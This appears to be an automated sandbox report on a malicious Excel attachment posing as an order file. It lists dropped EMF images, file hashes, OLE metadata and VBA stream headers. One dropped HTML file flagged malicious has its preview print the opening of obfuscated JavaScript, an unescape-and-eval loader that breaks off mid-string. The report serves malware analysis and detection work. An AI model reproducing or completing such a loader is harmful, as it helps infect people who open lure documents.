        Preview:....l...............e............n...=.. EMF........6.......................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!.............................................../...f..."...........!.............................................../...f..."...........!.............................................../...f..."...........!.............................................../...f..."...........!.............................................../...f...R...p...................................T.i.m.e.s. .N.e.w. .R.o.m.a.n........................................................@...............8/....X.....8/........................X...................N.8/@....y8/.....m8/|...............|.....................8/.................8/
        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
        File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
        Category:dropped
        Size (bytes):99352
        Entropy (8bit):2.6838553390701954
        Encrypted:false
        SSDEEP:768:hOePv331DW7ohBb66mQK4BTonxqQbApQKyE:UCQE
        MD5:15460A3716F7BD04F7C174FA6DB0B50B
        SHA1:A72C811FEB6F99380BB2FBA5216C375559C9BC6E
        SHA-256:61E8ED0821655DBB7BB42559DB4C602865A8C94B5E2B596868EE1999B2B05A40
        SHA-512:71D9A62BE671D43ED81A1BCD80D73AB50546EED1ADEEE6E4F6C99488FC0B0A2AD222A3A0692E0EF1C909F4402F6E32914E632941117C5150752F598408F4E3AE
        Malicious:false
        Preview:....l............................}...... EMF....................................S....................*..U"..F...,... ...EMF+.@..................`...`...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........!......."...........!......."...........................!.......%.......................................................................%...........%...........K..............."...........!.......................................................K..............."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.......................%...................................L...d...............!...............)...!..............?...........?................................L...d...E...............E...............!..............?........
        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
        File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
        Category:dropped
        Size (bytes):13372
        Entropy (8bit):2.646909383954048
        Encrypted:false
        SSDEEP:96:Xgk+uuOAo4u+/XXXoQ5FSYPGGU+LB3mIzlYsoXpJPJ0HWSj0T84b4IjV:GoaHXofXGvDDoWj0DbN
        MD5:40363782C75697A8DD5CE1FDE7C5266C
        SHA1:0D6F814F2DA43AA503C720B1A790AAA357571F4A
        SHA-256:437BFD34C0290BD712E83D0C54A6ABBB370E6C35B0ECEC6ACC0FCCD32A104732
        SHA-512:D43CEF0D3E4F74D668F931496D104457BA97DDDB19BAB04BE5B64F29FE0F7DCD25EB3E01BEDAE455330E6E1A4A521869057C33B30FA7F7F1A295A57C6398C9E6
        Malicious:false
        Preview:....l...........................|,..\... EMF....<4..O...........................S....................*..U"..F...,... ...EMF+.@..................`...`...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........!......."...........!......."...........................!.......%.......................................................................%...........%...........K..............."...........!.......................................................K..............."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................R...p.................................. C.a.l.i.b.r.i........................................................k.u@b...D.u........NAI.`b..-..C`b...U ..c...d...#.........@........c........#..V...f#.... .0..._#.....|c...X.l.$..
        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
        File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
        Category:dropped
        Size (bytes):13444
        Entropy (8bit):2.644070176334978
        Encrypted:false
        SSDEEP:96:tgk+uuOAo+vSZXXog5FSPwG3+u9B3CNlYsonpJPJ0HWSj0T84b4IjV:UopXovYG3wDoGj0DbN
        MD5:B3A62881C567D2E5C758B8E7F2AEA888
        SHA1:2F57C98BD0D60C9549F20F262FE92BEC68E1FB8D
        SHA-256:E46BF206993C3C8D1446DFD763FB3E75ABEB6072A91F9807E7AC3BE6CFF022A7
        SHA-512:677990F1EE19B7BA4378F7C2B7180671DD8CA54ED1474441A88024D74115B18FB49C9581CFECE191F5D8E9ADC94A34FC67AA5FD2B2C72201B99D1DB199CDB99E
        Malicious:false
        Preview:....l...........................|,..\... EMF.....4..U...........................S....................*..U"..F...,... ...EMF+.@..................`...`...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........!......."...........!......."...........................!.......%.......................................................................%...........%...........K..............."...........!.......................................................K..............."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................R...p.................................. C.a.l.i.b.r.i........................................................k.u@b...D.u........NAI.`b..-..C`b...U ..c...d...#.........@........c........#..V...f#.... .0..._#.....|c...X.l.$..
        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
        File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
        Category:dropped
        Size (bytes):44256
        Entropy (8bit):3.15066292565687
        Encrypted:false
        SSDEEP:384:IhpMW5NFNimpUIuOjwTsiyGGiugBhUErpxTORe4tyIWY5:BWzi+8+GGidBhUErpxTORe4tyI9
        MD5:F1EC2E98B0F577B675156B13DCF94105
        SHA1:4FF2D02051E92771FBB245BA8095C80148A0F61A
        SHA-256:66AFB9C12E20A08F9A713C366EDE8A9CD8F4A93B7D7BFC76205013C28A3250E9
        SHA-512:6E442DB49BF2A429AD2CA7CB3804D79791C1E1FEB414F69FDDD58042E98C5AA5BFC1C751713DB76DD58DC9F3CAC3A7C491228797A909F8FD0291048E8F2FC9BE
        Malicious:false
        Preview:....l................................ .. EMF...............................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!......................................................."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.......................%...........................................................L...d...........................m...-...!..............?...........?................................R...p.................................. A.r.i.a.l...............................................
        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
        File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
        Category:dropped
        Size (bytes):149960
        Entropy (8bit):2.8267703084492224
        Encrypted:false
        SSDEEP:1536:5HoZVGL1ENUAI8DHW/97p8/JYbhaEUbNviLH:GI1H
        MD5:E14D6B627C34F3D81321F2D1F78420CA
        SHA1:F7D45BD16338C3594AD67C992B28A28CCC788BA2
        SHA-256:D1FEFC6979EC45C55264F6651F7F8CB31053A923AD64DF584918FF635C64E54E
        SHA-512:83FA30C5A5680901DDA5C70F4F4D74FFAAA053A4C3D0862F15A0F0244EBE23CBCD97D8763CD870BD31248BD323144D9026F78E3A1E31E7051571D5F0833498DA
        Malicious:false
        Preview:....l...........................Z....G.. EMF.....I..............................S....................*..U"..F...,... ...EMF+.@..................`...`...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........!......."...........!......."...........................!.......%.......................................................................%...........%...........K..............."...........!.......................................................K..............."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................R...p...................................T.i.m.e.s. .N.e.w. .R.o.m.a.n.............................................f ..........`A....(.......0.....j ..j .............b....u0...........9...0....f#.m.2......... ...|c...X.l.$..
        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
        File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
        Category:dropped
        Size (bytes):44256
        Entropy (8bit):3.147465798679962
        Encrypted:false
        SSDEEP:384:j1W5NF0vUXfOjwTsiyGGiugBhUErpxTORe4tyJ2c:ZWYW+GGidBhUErpxTORe4ty5
        MD5:36D8FF25D14E7E2FBB1968E952FF9C17
        SHA1:E3BD7140DA6CAD87C5A1D5417DFBDD7B0E67B110
        SHA-256:305DCBFBEB9FFEE587E061D779CA1DDF31939ECD64EEE7D8A22BA9D640B48633
        SHA-512:B4B753222F617F78B36949BD9F37E13D68D9FD7367484BEE799F0D7AE38E1705E997A6409251BC2B9830012536FBD08C3C6CB7411D9122F939833F38E303DCBF
        Malicious:false
        Preview:....l................................ .. EMF...............................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!......................................................."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.......................%...........................................................L...d...........................m...-...!..............?...........?................................R...p.................................. A.r.i.a.l...............................................
        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
        File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
        Category:dropped
        Size (bytes):150296
        Entropy (8bit):2.817773450744853
        Encrypted:false
        SSDEEP:1536:gH7vVM61ENUAI8DHW/97p8/JYbhaEUbNQRES:+7KS
        MD5:DC0240D57D0E3639A6604D6691F0620B
        SHA1:075F9AD2AD3DC09897720EEA28467F04F6441C91
        SHA-256:6438C87DE3477113C39D92F0FE2F009B2EF1BEED46242FE05A969CFD3018C857
        SHA-512:E2CF56E142330B03E7D4102D3A3C03676AB1B532F62592BAF1E971361B3829EF65B30432F756D2CE6F260FB8532A0ED9468AC8BB0418BCDF6D506014EDD610B5
        Malicious:false
        Preview:....l...........................Z....G.. EMF.....K..............................S....................*..U"..F...,... ...EMF+.@..................`...`...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........!......."...........!......."...........................!.......%.......................................................................%...........%...........K..............."...........!.......................................................K..............."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................R...p...................................T.i.m.e.s. .N.e.w. .R.o.m.a.n.............................................f ..........`A....(.......0.....j ..j .............b....u0...........9...0....f#.m.2......... ...|c...X.l.$..
        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
        File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
        Category:dropped
        Size (bytes):1293620
        Entropy (8bit):4.563127917199792
        Encrypted:false
        SSDEEP:6144:HepUelSAzNeNpVAZSedri2/Op4mD3f5ReZdZJElOFmkDrvwA2w4Meh/q4MmuRDrM:HepRlSPiS4ri2/lmzCJEuL1eU1muq
        MD5:F71C973B5E362DFD6408D6C009E5643E
        SHA1:24B3CE67B31BFD4791287932206D54C73489424E
        SHA-256:27D0986B7EC233689490135118670F01325F21DFD6F60492AF5D62C7CF1E3045
        SHA-512:4C3F506BC4313437C9194EED3CD5AB6616490AE376FC61DD38D8E00F975C41A23FC8D322E41CFBEC380F04F49ADF6E77A3B22BB5C96EBE714F5713B09838F1F4
        Malicious:false
        Preview:....l...........%...............@m..?... EMF....4....!..1...................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...................................................3..."...........!...................................................3..."...........!...................................................3..."...........!...................................................3..."...........!...................................................3...'.......................%...........................................................L...d...v.../......._...v.../.......1...!..............?...........?................................L...d...................................!..............?...........?............................
        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
        File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
        Category:dropped
        Size (bytes):13284
        Entropy (8bit):2.735825271732709
        Encrypted:false
        SSDEEP:96:9pyRiCCyynOYeK4jlGWS0BL7g5lqUTM/tIdSUsQ5lV:9rR/W305sUTMpQR
        MD5:901DCD18F7643CAEBDE4301E05F5C748
        SHA1:A0ABDDACFFDE3CCF88AA4CBC6F7B252385745BA4
        SHA-256:BBE8A43E3E499CE8744B1C8680300A8C4EAD33C08EE82CC4D59624C0BB871FB1
        SHA-512:ADF5729E56F94556E7C979202C75FC1B051B3D9B7B30344C6E9DFE0F5164B3D30554505DC1E9BB8C6319A50436B533EAC7021CC030E040659D02C0616EE3A743
        Malicious:false
        Preview:....l...........#...V...........Z&...... EMF.....3..K.......................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...............................................$...W..."...........!...............................................$...W..."...........!...............................................$...W..."...........!...............................................$...W..."...........!...............................................$...W...R...p.................................. C.a.l.i.b.r.i......................................................................................../....(....../...................._...(...................N../.............m./L...............L....................../........\........./
        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
        File Type:HTML document, ASCII text, with very long lines (8810), with CRLF line terminators
        Category:dropped
        Size (bytes):8896
        Entropy (8bit):2.805964965465494
        Encrypted:false
        SSDEEP:192:tHaCEHfLum2oum2J5KUJDVUKhC74GVf/Aq2v9PV8aQeS2eLPyqv6vRc6cfzqfz45:t1EHfLum2oum2J5KUJDVUKhC74GVf/Ak
        MD5:FFAADBF04E0201F2413D3E81B47B50F5
        SHA1:FC490F928D5E8791CCC26C4C957F3786FEF50BB2
        SHA-256:648358DD4259AD9FC6E5F723487B6F009110CD976701032931163A74555258B0
        SHA-512:D726B722657BEAD1FE160C953A43AE7D46970E0AA8F2C405D9E72D6A853443F14D1A2512B04399D5798B39DAD8332C8BDC900216AA1A1E6B656925A224B6EED7
        Malicious:true
        Preview:<Script Language='Javascript'>.. HTML Encryption provided by tufat.com -->.. ..document.write(unescape('%3C%68%74%6D%6C%3E%0A%3C%68%65%61%64%3E%0A%3C%2F%68%65%61%64%3E%0A%3C%62%6F%64%79%3E%0A%0A%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%3E%0A%3C%21%2D%2D%20%0A%65%76%61%6C%28%75%6E%65%73%63%61%70%65%28%27%25%36%36%25%37%35%25%36%65%25%36%33%25%37%34%25%36%39%25%36%66%25%36%65%25%32%30%25%36%32%25%33%36%25%33%31%25%33%34%25%33%32%25%33%31%25%32%38%25%37%33%25%32%39%25%32%30%25%37%62%25%30%61%25%30%39%25%37%36%25%36%31%25%37%32%25%32%30%25%37%32%25%32%30%25%33%64%25%32%30%25%32%32%25%32%32%25%33%62%25%30%61%25%30%39%25%37%36%25%36%31%25%37%32%25%32%30%25%37%34%25%36%64%25%37%30%25%32%30%25%33%64%25%32%30%25%37%33%25%32%65%25%37%33%25%37%30%25%36%63%25%36%39%25%37%34%25%32%38%25%32%32%25%33%32%25%33%33%25%33%33%25%33%34%25%33%30%25%33%38%25%33%31%25%33%37%25%32%32%25%32%39%25%33%62%25%30%61%25%30%39%25%37%33%25%32%30%25%33%64%25%32%30%
        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
        File Type:data
        Category:dropped
        Size (bytes):512
        Entropy (8bit):0.0
        Encrypted:false
        SSDEEP:3::
        MD5:BF619EAC0CDF3F68D496EA9344137E8B
        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
        Malicious:false
        Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
        File Type:data
        Category:dropped
        Size (bytes):512
        Entropy (8bit):0.0
        Encrypted:false
        SSDEEP:3::
        MD5:BF619EAC0CDF3F68D496EA9344137E8B
        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
        Malicious:false
        Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
        File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Wed Dec 18 01:00:45 2024, Security: 1
        Category:dropped
        Size (bytes):1124352
        Entropy (8bit):7.743408666722072
        Encrypted:false
        SSDEEP:12288:y8zJmzHJEUiOIBUzMTSSD3DERnLRmF8DhEPpxpsAQx1Zj+jLEPHbrpW8osAz85qW:MBanbARM8At8Z+j6RsSIUAI
        MD5:6BCC53DC843155E886F469778B4216F1
        SHA1:CA277194F41D84C108389A788D7281E7566ED9F0
        SHA-256:379FE2AE5A34B2349FE492B4318C589416C5CC8F1E54EB1502455863DA17395E
        SHA-512:CD6DA13C89795461E4B804BE52500B9DB81887D18CADB0DD431CC49850DB189F4E6DBB9731810D3AE55C7145EE46EE5FDC9E9606DFC73B08C2D9E5A9169ABC28
        Malicious:true
        Antivirus:
        • Antivirus: Joe Sandbox ML, Detection: 100%
        Preview:......................>.......................................................i...j...k...l...m...............V...W...r.......g.......i...................................................................................................................................................................................................................................................................................................................................................................................................h...........................................................................................................U... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...............................o...p...q...r...s...t...u...v...w...x...y...z...
        File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Wed Dec 18 01:00:45 2024, Security: 1
        Entropy (8bit):7.743408666722072
        TrID:
        • Microsoft Excel sheet (30009/1) 47.99%
        • Microsoft Excel sheet (alternate) (24509/1) 39.20%
        • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
        File name:Order_948575494759.xls
        File size:1'124'352 bytes
        MD5:6bcc53dc843155e886f469778b4216f1
        SHA1:ca277194f41d84c108389a788d7281e7566ed9f0
        SHA256:379fe2ae5a34b2349fe492b4318c589416c5cc8f1e54eb1502455863da17395e
        SHA512:cd6da13c89795461e4b804be52500b9db81887d18cadb0dd431cc49850db189f4e6dbb9731810d3ae55c7145ee46ee5fdc9e9606dfc73b08c2d9e5a9169abc28
        SSDEEP:12288:y8zJmzHJEUiOIBUzMTSSD3DERnLRmF8DhEPpxpsAQx1Zj+jLEPHbrpW8osAz85qW:MBanbARM8At8Z+j6RsSIUAI
        TLSH:0C35F1E5774DAB52CA06123575F3939E2714AC03D902427B36F8732D2AF7AD08607FA6
        File Content Preview:........................>.......................................................i...j...k...l...m...............V...W...r.......g.......i......................................................................................................................
        Icon Hash:35ed8e920e8c81b5
        Document Type:OLE
        Number of OLE Files:1
        Has Summary Info:
        Application Name:Microsoft Excel
        Encrypted Document:True
        Contains Word Document Stream:False
        Contains Workbook/Book Stream:True
        Contains PowerPoint Document Stream:False
        Contains Visio Document Stream:False
        Contains ObjectPool Stream:False
        Flash Objects Count:0
        Contains VBA Macros:True
        Code Page:1252
        Author:
        Last Saved By:
        Create Time:2006-09-16 00:00:00
        Last Saved Time:2024-12-18 01:00:45
        Creating Application:Microsoft Excel
        Security:1
        Document Code Page:1252
        Thumbnail Scaling Desired:False
        Contains Dirty Links:False
        Shared Document:False
        Changed Hyperlinks:False
        Application Version:786432
        General
        Stream Path:MBD0191BFB8/MBD007203CB/_VBA_PROJECT_CUR/VBA/Sheet1
        VBA File Name:Sheet1.cls
        Stream Size:977
        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ` ! . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
        Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 60 98 21 8f 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
        Attribute VB_Name = "Sheet1"
        Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
        Attribute VB_GlobalNameSpace = False
        Attribute VB_Creatable = False
        Attribute VB_PredeclaredId = True
        Attribute VB_Exposed = True
        Attribute VB_TemplateDerived = False
        Attribute VB_Customizable = True
        

        General
        Stream Path:MBD0191BFB8/MBD007203CB/_VBA_PROJECT_CUR/VBA/Sheet2
        VBA File Name:Sheet2.cls
        Stream Size:977
        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ` 3 . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
        Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 60 98 fe 33 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
        Attribute VB_Name = "Sheet2"
        Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
        Attribute VB_GlobalNameSpace = False
        Attribute VB_Creatable = False
        Attribute VB_PredeclaredId = True
        Attribute VB_Exposed = True
        Attribute VB_TemplateDerived = False
        Attribute VB_Customizable = True
        

        General
        Stream Path:MBD0191BFB8/MBD007203CB/_VBA_PROJECT_CUR/VBA/ThisWorkbook
        VBA File Name:ThisWorkbook.cls
        Stream Size:985
        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ` . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 1 . 9 . - .
        Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 60 98 0b bc 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
        Attribute VB_Name = "ThisWorkbook"
        Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
        Attribute VB_GlobalNameSpace = False
        Attribute VB_Creatable = False
        Attribute VB_PredeclaredId = True
        Attribute VB_Exposed = True
        Attribute VB_TemplateDerived = False
        Attribute VB_Customizable = True
        

        General
        Stream Path:_VBA_PROJECT_CUR/VBA/Sheet1
        VBA File Name:Sheet1.cls
        Stream Size:977
        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - . 0
        Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 9d 36 9c b7 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
        Attribute VB_Name = "Sheet1"
        Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
        Attribute VB_GlobalNameSpace = False
        Attribute VB_Creatable = False
        Attribute VB_PredeclaredId = True
        Attribute VB_Exposed = True
        Attribute VB_TemplateDerived = False
        Attribute VB_Customizable = True
        

        General
        Stream Path:_VBA_PROJECT_CUR/VBA/Sheet2
        VBA File Name:Sheet2.cls
        Stream Size:977
        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 | . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
        Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 9d 36 86 7c 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
        Attribute VB_Name = "Sheet2"
        Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
        Attribute VB_GlobalNameSpace = False
        Attribute VB_Creatable = False
        Attribute VB_PredeclaredId = True
        Attribute VB_Exposed = True
        Attribute VB_TemplateDerived = False
        Attribute VB_Customizable = True
        

        General
        Stream Path:\x1CompObj
        CLSID:
        File Type:data
        Stream Size:114
        Entropy:4.25248375192737
        Base64 Encoded:True
        Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
        Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
        General
        Stream Path:\x5DocumentSummaryInformation
        CLSID:
        File Type:data
        Stream Size:244
        Entropy:2.889430592781307
        Base64 Encoded:False
        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . .
        Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a1 00 00 00 02 00 00 00 e4 04 00 00
        General
        Stream Path:\x5SummaryInformation
        CLSID:
        File Type:data
        Stream Size:200
        Entropy:3.3020681057018666
        Base64 Encoded:False
        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . | . # . @ . . . D P . . . . . . . . .
